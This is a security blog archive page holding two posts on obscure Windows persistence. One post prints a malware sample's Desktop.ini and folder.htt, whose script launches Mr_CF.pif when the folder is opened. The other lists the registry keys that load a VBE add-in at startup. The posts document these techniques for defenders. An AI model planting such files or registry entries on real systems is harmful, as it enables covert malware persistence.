Category Archives: Autostart (Persistence)

Beyond good ol’ Run key, Part 49

Posted on by

I was reviewing the logs of my sandbox and came across a very old malware that was using an old-school trick as a way to increase its chances of survival – it used the desktop.ini / folder.htt combo that comes to play when the Web View is chosen for folders (XP or earlier). I know, I know.. it’s archaeology… but I checked my old posts in this series and realized I have not covered it yet, so I am fixing it now…

An example Desktop.ini created by the malware looks like this:

[.ShellClassInfo]
ConfirmFileOp=0
[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=file://Folder.htt
[ExtShellFolderViews]
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}

and the associated folder.htt like this:

<html>
<head>
<meta http-equiv="content-type"content="text/html; charset=Windows-1252">
</head>
<body style="margin: 0" scroll=no>
<object id=FileList border=0 tabindex=1
classid= "clsid:1820FED0-473E-11D0-A96C-00C04FD705A2"
style="width: 100; height: 100" tabIndex=-1>
</object>
</body>
</html>
<script>
objectstr="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
objectstr+="CODEBASE=\"Mr_CF.pif#version=1,1,1,1\">"
objectstr+="<PARAM NAME=\"_Version\" VALUE=\"65536\">"
objectstr+="</OBJECT>"
objectstr+="<HTML><H1></H1></HTML>";
document.writeln(objectstr);
document.close();
</script>

There is not much more I can write here… this is super old-school and I am just adding it for completeness.

Beyond good ol’ Run key, Part 48

Posted on by

I have just updated my very old post about HKLM\SOFTWARE\Microsoft\VBA\Monitors. I discovered its additional ‘properties’ while looking at the VBE (Visual Basic Engine). On the way, I have also discovered that Visual Basic for Application’s old-school IDE allows programmers to create Add-ins. A quick googling followed and I immediately found a number of Addins for VBE – I was actually quite surprised that there are so many!

Seriously, there is a huge interest in it! With all the C, Java, python programmers out there… it would seem that VBA is strong and here to stay…

So, anyway… I didn’t spend much time on it as many programmers already provide good examples of VBE Add-ins, so I will just document where to find the possible persistence entries.

The Add-ins are discovered by VBE by enumeration of the following key:

  • HKCU\Software\Microsoft\VBA\VBE\6.0\Addins\<AddInName>\…

Each Add-in has a dedicated subkey where it lists the properties:

  • Description – Full description
  • FriendlyName – Short name
  • LoadBehavior – A DWORD that indicates whether the Add-in is loaded at startup (1), is currently unloaded (0)
  • SatelliteDllName + SatelliteDllPath  – references to localized information about the plug-in

So, anyone wanting to load the VBE Add-in needs to set up the Registry key with the aforementioned values, and then create the appropriate entries under HKCR:

  • HKCR\<AddInName>\Clsid = <GUID>
  • HKCR\CLSID\{<GUID>}\InprocServer32 = …